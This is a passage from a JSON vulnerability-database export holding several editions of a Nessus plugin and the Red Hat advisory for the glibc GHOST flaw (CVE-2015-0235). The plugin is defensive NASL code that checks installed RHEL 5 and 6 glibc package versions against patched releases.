audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "title": "RHEL 6 : glibc (RHSA-2015:0099) (GHOST)", "type": "nessus", "viewCount": 2}, "differentElements": ["modified", "sourceData", "title"], "edition": 10, "lastseen": "2018-12-15T03:59:03"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2015-0235"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "edition": 1, "hash": "654525b91e7c216acff1589a5737f2525d35cd34ccd4b59de54ed0c9fb0882e5", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "5a30b331c491a149b274795dcb31aa8e", "key": "description"}, {"hash": "841f459c9764bcdcd6d5a1955f15a6d5", "key": "cvelist"}, {"hash": "aff19e7d2f5800fbf65dc3d944df032a", "key": "cvss"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3d8d634cf2d0899c0d90aff4e213fae6", "key": "published"}, {"hash": "171fe111432bb959f6bfd6b01e5adbc8", "key": "sourceData"}, {"hash": "cf5ab192321e0c9602e97a714f8a5102", "key": "modified"}, {"hash": "813366c4a714f890ad158fca7c40bbaf", "key": "pluginID"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "cbab536cd5fdc2c0e0d64b3cdab702d9", "key": "title"}, {"hash": "2091fc8b5268a0c4b492e97e601c3a5f", "key": "references"}, {"hash": "341a141f8365cdd9e626c9fa294e819c", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81068", "id": "REDHAT-RHSA-2015-0099.NASL", "lastseen": "2016-09-26T17:25:21", "modified": "2015-10-22T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.2", "pluginID": "81068", "published": "2015-01-29T00:00:00", "references": ["http://rhn.redhat.com/errata/RHSA-2015-0099.html", "https://www.redhat.com/security/data/cve/CVE-2015-0235.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"$Revision: 1.12 $\");\n script_cvs_date(\"$Date: 2015/10/22 14:23:02 $\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_osvdb_id(117579);\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2015-0235.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2015-0099.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5\\.6|5\\.9|6\\.2|6\\.4|6\\.5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.2 / 6.4 / 6.5\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nsp = get_kb_item(\"Host/RedHat/minor_release\");\nif (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\nflag = 0;\nif (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\nif (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\nif (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:25:21"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2015-0235"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "edition": 2, "enchantments": {}, "hash": "5b43ed260a34fd0d163031f15ac65bdf770f36371511e72c7f7a4c20cf8d7895", "hashmap": [{"hash": "5a30b331c491a149b274795dcb31aa8e", "key": "description"}, {"hash": "841f459c9764bcdcd6d5a1955f15a6d5", "key": "cvelist"}, {"hash": "3c56ce37c7228a5617a8007318ab4b21", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3d8d634cf2d0899c0d90aff4e213fae6", "key": "published"}, {"hash": "813366c4a714f890ad158fca7c40bbaf", "key": "pluginID"}, {"hash": "fef0e25dffa9e6451f742c4bce169e44", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "cbab536cd5fdc2c0e0d64b3cdab702d9", "key": "title"}, {"hash": "2091fc8b5268a0c4b492e97e601c3a5f", "key": "references"}, {"hash": "341a141f8365cdd9e626c9fa294e819c", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81068", "id": "REDHAT-RHSA-2015-0099.NASL", "lastseen": "2017-01-06T22:11:56", "modified": "2017-01-06T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.2", "pluginID": "81068", "published": "2015-01-29T00:00:00", "references": ["http://rhn.redhat.com/errata/RHSA-2015-0099.html", "https://www.redhat.com/security/data/cve/CVE-2015-0235.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2017/01/06 15:51:00 $\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_osvdb_id(117579);\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2015-0235.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2015-0099.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif 